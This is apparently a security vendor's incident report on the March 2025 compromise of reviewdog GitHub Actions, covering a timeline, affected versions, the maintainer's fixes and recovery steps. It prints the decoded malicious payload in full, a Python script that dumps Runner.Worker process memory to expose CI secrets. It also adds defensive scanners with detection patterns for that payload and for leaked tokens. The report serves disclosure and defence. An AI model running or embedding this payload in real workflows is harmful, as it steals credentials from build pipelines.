reviewdog GitHub Actions are compromised

The supply chain compromise of reviewdog GitHub Actions has been resolved. This post summarizes the incident, how it was discovered, and what you should do to protect your workflows.
Varun Sharma

March 18, 2025


Introduction

We have concluded our investigation into the supply chain attack affecting several GitHub Actions in the reviewdog organization. Independent researcher Adnan Khan initially disclosed the compromise on March 17, 2025. The affected Action, reviewdog/action-setup@v1, was found to contain malicious code designed to extract CI/CD secrets from GitHub Actions runners. On the same day, Wiz published an in-depth analysis of the attack.

The maintainer has since taken corrective steps to recover from the incident, and details of the recovery timeline, technical findings, and recommended mitigations are outlined below. While the immediate threat has been contained, this event underscores the broader risk of supply chain attacks in CI/CD workflows and the importance of proactive defense.

Timeline of Key Updates

  • March 17, 2025 01:00 AM UTC – Researcher Adnan Khan publicly disclosed the compromise.
  • March 18, 2025 09:00 PM UTC – The maintainer published a response and confirmed that the compromise occurred between March 11, 2025 18:42 and 20:31 UTC.

Summary of the incident

Independent researcher Adnan Khan disclosed the incident via a tweet on Monday, March 17, at 01:00 AM UTC.

The researcher identified a sample workflow run in which the malicious Action version was executed. The screenshot of that run shows that the reviewdog/action-setup@v1 tag resolved to commit SHA f0d342d24037bb11d26b9bd8496e0808ba32e9ec.

This commit contains the exploit payload in base64-encoded form:

https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec

The decoded payload is given below:

#!/usr/bin/env python3

# based on https://davidebove.com/blog/?p=1620

import sys
import os
import re


def get_pid():
    # https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
            if b'Runner.Worker' in cmdline_f.read():
                return pid

    raise Exception('Can not get pid of Runner.Worker')


if __name__ == "__main__":
    pid = get_pid()
    print(pid)

    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        for line in map_f.readlines():  # for each mapped region
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
            if m.group(3) == 'r':  # readable region
                start = int(m.group(1), 16)
                end = int(m.group(2), 16)
                # hotfix: OverflowError: Python int too large to convert to C long
                # 18446744073699065856
                if start > sys.maxsize:
                    continue
                mem_f.seek(start)  # seek to region start
            
                try:
                    chunk = mem_f.read(end - start)  # read region contents
                    sys.stdout.buffer.write(chunk)
                except OSError:
                    continue

This payload, similar to the tj-actions/changed-files incident, accesses the Runner.Worker process memory to steal GitHub Actions secrets. The exfiltrated secrets are subsequently printed in the GitHub Actions workflow logs. The following screenshot from the sample run shows the dumped secrets within the build logs.

A GitHub code search in the reviewdog organization shows that several other composite Actions depend on reviewdog/action-setup. The composite reviewdog Actions that use reviewdog/action-setup are listed below.

1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos

Because reviewdog/action-setup is compromised, it is safe to assume that at least the Actions listed above in the reviewdog organization are also compromised.
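The decoded payload above has a recognizable shape once the base64 wrapper is removed: it looks for the Runner.Worker process, parses /proc/<pid>/maps and reads /proc/<pid>/mem. Composite Actions that vendor or call reviewdog/action-setup can be checked for the same pattern. The following scanner is an added example written for this post, not code from reviewdog or StepSecurity; it decodes every base64-looking run in a file and flags decoded text that carries those markers. The action definition it scans is a constructed sample, and the second blob in it is marker text only, not the real payload.

```python
import base64
import re

# Markers taken from the decoded payload shown above: it locates the
# Runner.Worker process, parses /proc/<pid>/maps and reads /proc/<pid>/mem.
SUSPICIOUS_MARKERS = (b"Runner.Worker", b"/proc/", b"/maps", b"/mem")

# A run of base64-alphabet characters long enough to carry a script body.
BASE64_BLOB = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def decode_blobs(data: bytes):
    """Yield (offset, decoded_bytes) for every base64-looking run in data."""
    for m in BASE64_BLOB.finditer(data):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        yield m.start(), decoded


def find_encoded_payloads(data: bytes, min_markers: int = 2):
    """Return findings for decoded blobs that contain at least min_markers of
    the memory-dumping markers. Two are required so that a blob that merely
    mentions /proc/ does not trigger on its own."""
    findings = []
    for offset, decoded in decode_blobs(data):
        hits = [mk.decode() for mk in SUSPICIOUS_MARKERS if mk in decoded]
        if len(hits) >= min_markers:
            findings.append({
                "offset": offset,
                "markers": hits,
                "preview": decoded[:60].decode("utf-8", "replace"),
            })
    return findings


def scan_file(path: str):
    """Scan one file (an action.yml, install script, etc.) from disk."""
    with open(path, "rb") as f:
        return find_encoded_payloads(f.read())


# Constructed sample: a composite action definition with one harmless
# base64 string and one blob whose decoded text carries the markers.
# Neither blob is the real payload; the second is marker text only.
_HARMLESS = base64.b64encode(b"just a harmless greeting string for testing purposes")
_MARKED = base64.b64encode(
    b"for pid in os.listdir('/proc'): find Runner.Worker, "
    b"then parse /proc/<pid>/maps and read /proc/<pid>/mem"
)
CONSTRUCTED_ACTION_YML = (
    b"name: example composite action (constructed)\n"
    b"runs:\n"
    b"  using: composite\n"
    b"  steps:\n"
    b"    - run: echo " + _HARMLESS + b" | base64 -d\n"
    b"      shell: bash\n"
    b"    - run: echo " + _MARKED + b" | base64 -d | python3\n"
    b"      shell: bash\n"
)

if __name__ == "__main__":
    for finding in find_encoded_payloads(CONSTRUCTED_ACTION_YML):
        print(f"offset {finding['offset']}: markers={finding['markers']} "
              f"preview={finding['preview']!r}")
```

The marker list is deliberately small and specific to this payload; a blob that is merely long or merely base64 is not reported, only one whose decoded text reads like a process-memory dumper. Run scan_file over the checked-out sources of any composite Action you depend on.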

Maintainer’s Response

Incident Background

The maintainers of the reviewdog GitHub Actions have acknowledged the security breach and provided additional details about the compromise. According to their investigation, the attack targeted reviewdog/action-setup@v1, potentially leading to the compromise of other widely used GitHub Actions, including tj-actions/changed-files. As a result, repositories using these actions may have inadvertently leaked sensitive information.

The compromise occurred on March 11, 2025, between 18:42 and 20:31 UTC.

How Did the Attack Happen?

The attacker managed to push malicious code to the v1 tag of reviewdog/action-setup. The reviewdog organization’s contributor management process appears to have played a role in this incident. Contributors to reviewdog/action-* repositories were automatically invited to a maintainer team that had write access to these repositories. At the time of the attack, this team had 118 members, increasing the likelihood of an account being compromised.

While the exact method of exploitation is still under investigation, the maintainers suspect the attacker either compromised an existing contributor’s account or gained write access through the automated invitation process. The reviewdog maintainers have clarified that contributors did not have write access to the main reviewdog repository or core projects such as errorformat.

Impacted GitHub Actions

The following reviewdog actions have been identified as affected:

  • reviewdog/action-setup@v1 (other tags may also be impacted, though no evidence has been found)
  • reviewdog/action-shellcheck@{<v1.29.2}
  • reviewdog/action-composite-template@{<v0.20.2}
  • reviewdog/action-staticcheck@{<v1.26.2}
  • reviewdog/action-ast-grep@{<v1.26.2}
  • reviewdog/action-typos@{<v1.17.2}

There is a possibility that other reviewdog actions may also be impacted, though no additional evidence has been found so far.

Actions Taken by the Maintainers

In response to the breach, the maintainers have implemented several security measures:

  • Disabled the automated contributor invitation workflow to prevent unauthorized access.
  • Revoked write access for most contributors, restricting it to a small group of trusted maintainers.
  • Updated all reviewdog repositories to explicitly reference GitHub Actions by commit SHA instead of version tags.
  • Pinned reviewdog binary installation scripts using commit SHAs.
  • Reviewed security logs and found no suspicious activity related to their maintainer and bot accounts.
  • Rotated or revoked Personal Access Tokens (PATs) associated with maintainer and bot accounts.

Recovery steps

🚨 If you are using any of the following Actions from the reviewdog organization, we strongly recommend that you stop using them immediately until the incident is resolved.

1. reviewdog/action-setup
2. reviewdog/action-shellcheck
3. reviewdog/action-composite-template
4. reviewdog/action-staticcheck
5. reviewdog/action-ast-grep
6. reviewdog/action-typos

If possible, stop using all reviewdog Actions until the impact of the incident is clear.

Review Actions Inventory

You should perform a code search across your repositories to discover all instances of the reviewdog Actions. For example, the following GitHub search URL shows this information for the Actions GitHub organization:

https://github.com/search?q=org%3Aactions+reviewdog&type=code

Please note that this GitHub search does not always return accurate results. If you have a dedicated source code search solution such as Sourcegraph, it may be more effective at finding all instances of this Action in use.

Review GitHub Actions Workflow Run Logs

You should review the logs of recent workflow runs that executed reviewdog Actions and check whether they leaked secrets. Below is an example of how leaked secrets appear in build logs.

This step is especially important for public repositories since their logs are publicly accessible.
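The payload writes raw process memory to the job log, so leaked credentials appear as token-shaped strings in otherwise ordinary log lines. The scanner below is an added example written for this post (not StepSecurity's leaked-secrets control): it runs a few well-known credential patterns over downloaded run logs and reports redacted matches per line. The patterns, the "***" masking convention and the log lines are assumptions and constructed sample data; a memory dump can also contain fragments or differently encoded values, so no match is not proof that nothing leaked.

```python
import re

# Well-known credential shapes. This list is an assumption for the example
# and is deliberately short; a real review should use a fuller rule set.
TOKEN_PATTERNS = {
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "github_fine_grained_pat": re.compile(r"\bgithub_pat_[A-Za-z0-9_]{22,255}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def redact(value: str) -> str:
    """Keep only enough of a match to identify it when reporting."""
    return value[:6] + "..." + value[-4:] if len(value) > 12 else "<redacted>"


def scan_log(log_text: str):
    """Return one finding per token-shaped match, with line number and kind.
    Values GitHub already masked as *** never match a pattern, so a masked
    registered secret is not reported as a leak."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for kind, pattern in TOKEN_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append({"line": lineno, "kind": kind, "value": redact(m.group(0))})
    return findings


def summarize(findings):
    """Count findings by credential kind, for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


# Constructed sample log: timestamps in the GitHub Actions log format, one
# masked registered secret, and three fabricated credential-shaped values
# (the AWS key is the well-known AWS documentation example key).
CONSTRUCTED_LOG = "\n".join([
    "2025-03-12T19:00:01.0000000Z Run reviewdog/action-setup@v1",
    "2025-03-12T19:00:02.0000000Z Using token ***",
    "2025-03-12T19:00:03.0000000Z 1234",
    "2025-03-12T19:00:03.0000000Z ACTIONS_RUNTIME_TOKEN=ghs_abcdefghijklmnopqrstuvwxyz0123456789",
    "2025-03-12T19:00:03.0000000Z AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "2025-03-12T19:00:04.0000000Z -----BEGIN RSA PRIVATE KEY-----",
])

if __name__ == "__main__":
    results = scan_log(CONSTRUCTED_LOG)
    for f in results:
        print(f"line {f['line']}: {f['kind']} {f['value']}")
    print(summarize(results))
```

Download each run's log (the "Download log archive" option, or the API) and pass the text to scan_log; anything it reports on a public repository should be treated as already exposed and rotated.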

Rotate Leaked Secrets

If you discover any secrets in GitHub Actions workflow run logs, rotate them immediately.

Pin GitHub Actions

You should pin your GitHub Actions to full-length commit SHAs to make sure that your workflows always use immutable references. StepSecurity community tier allows maintainers to pin Actions to their full-length commit SHAs for free. You can read about StepSecurity automation to pin Actions here.
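The two steps above, inventorying every reviewdog reference and checking whether each Action is pinned to a full-length commit SHA, can be done offline against checked-out workflow files. The audit below is an added example written for this post, not StepSecurity's inventory or pinning tooling. It scans `uses:` lines (a line-based scan, not a full YAML parser), applies the affected-version list from the maintainer's response, and treats every other reviewdog Action as "verify" in line with the advice to stop using them until the impact is clear. The workflow it scans is a constructed sample; the 40-zero SHA in it is a placeholder.

```python
import re

# Fixed versions from the maintainer's response above. reviewdog/action-setup
# has no fixed version listed, so every use of it is treated as affected.
FIXED_VERSIONS = {
    "reviewdog/action-shellcheck": (1, 29, 2),
    "reviewdog/action-composite-template": (0, 20, 2),
    "reviewdog/action-staticcheck": (1, 26, 2),
    "reviewdog/action-ast-grep": (1, 26, 2),
    "reviewdog/action-typos": (1, 17, 2),
}
ALWAYS_AFFECTED = {"reviewdog/action-setup"}

# Assumption: one `uses:` per line, as workflow files are normally written.
USES_LINE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
SEMVER_TAG = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)$")


def split_uses(ref):
    """'owner/repo[/path]@version' -> (owner/repo, version).
    Local (./) and docker:// references carry no version."""
    if ref.startswith("./") or ref.startswith("docker://"):
        return ref, None
    name, _, version = ref.partition("@")
    owner_repo = "/".join(name.split("/")[:2])  # drop any subdirectory path
    return owner_repo, version or None


def classify(owner_repo, version):
    """Return (status, pinned). pinned is True only for a full 40-hex SHA."""
    pinned = bool(version and FULL_SHA.match(version))
    if owner_repo.startswith("./") or owner_repo.startswith("docker://"):
        return "local", pinned
    if owner_repo in ALWAYS_AFFECTED:
        return "affected", pinned
    if owner_repo in FIXED_VERSIONS:
        m = SEMVER_TAG.match(version or "")
        if not m:  # mutable tag such as v1, or a SHA that must be checked by hand
            return "verify", pinned
        if tuple(map(int, m.groups())) < FIXED_VERSIONS[owner_repo]:
            return "affected", pinned
        return "fixed-version", pinned
    if owner_repo.startswith("reviewdog/"):  # not listed, but stop using until clear
        return "verify", pinned
    return ("pinned" if pinned else "unpinned"), pinned


def audit_workflow(text):
    """One finding per `uses:` line: line number, reference, status, pinned."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_LINE.match(line)
        if not m:
            continue
        owner_repo, version = split_uses(m.group(1))
        status, pinned = classify(owner_repo, version)
        findings.append({"line": lineno, "uses": m.group(1), "status": status, "pinned": pinned})
    return findings


def needs_action(findings):
    """Findings that require removal, replacement or manual verification."""
    return [f for f in findings if f["status"] in ("affected", "verify")]


# Constructed sample workflow; the all-zero SHA is a placeholder, not a real commit.
CONSTRUCTED_WORKFLOW = """\
name: lint (constructed sample)
on: [pull_request]
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-org/some-action@0000000000000000000000000000000000000000 # placeholder SHA
      - uses: reviewdog/action-setup@v1
      - uses: reviewdog/action-shellcheck@v1.29.1
      - uses: reviewdog/action-typos@v1.17.2
      - uses: reviewdog/action-golangci-lint@v2
      - uses: ./.github/actions/local-helper
"""

if __name__ == "__main__":
    for f in audit_workflow(CONSTRUCTED_WORKFLOW):
        print(f"line {f['line']:>3}  {f['status']:<14} pinned={f['pinned']!s:<5} {f['uses']}")
```

A "fixed-version" result still carries pinned=False when it references a tag: the fix is present, but the tag remains mutable, which is exactly how the v1 tag was abused here, so the reference should still be replaced with the tag's commit SHA.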

For StepSecurity Enterprise Customers

The following steps are applicable only to StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14-day free trial by installing the StepSecurity GitHub App to complete the following recovery steps.

Discover Leaked Secrets

We have added a new control specifically to detect leaked secrets in build logs due to this security incident. You can find the new control on the StepSecurity dashboard.

Review Actions Inventory

You can use the Actions inventory feature to discover all GitHub Actions workflows that are using reviewdog Actions.

Use the StepSecurity maintained reviewdog/action-setup Action

StepSecurity Maintained Actions are usually exclusive to StepSecurity enterprise customers.

To use the StepSecurity maintained Action for reviewdog/action-setup, simply replace all instances of "reviewdog/action-setup@vx" with "step-security/reviewdog-action-setup@fab6de28ae8bc2a032c9e655d990afa450edb995 # v1.3.2" or "step-security/reviewdog-action-setup@v1".

For enhanced security, you can pin to the specific commit SHA:

For more details, please refer to README of the project.

Pin GitHub Actions across organization

You can use the StepSecurity pinning dashboard control to discover all Actions that are not pinned in your organization and pin them through automated pull requests.

Next Steps

This incident has now been resolved. The maintainer has published a full response and implemented important long-term security controls.

🚨 More Supply Chain Attacks Could Follow

With credentials leaked in both the tj-actions compromise and this reviewdog incident, there may already be other supply chain attacks that have occurred—or could happen soon. Attackers could reuse leaked credentials to compromise additional GitHub Actions, making it critical to secure your CI/CD pipelines proactively.

👉 Curious how secure your workflows are? Run your repositories through Secure Repo to assess risks, detect misconfigurations, and lock down your CI/CD pipeline.

Let’s stay ahead of supply chain threats—together.
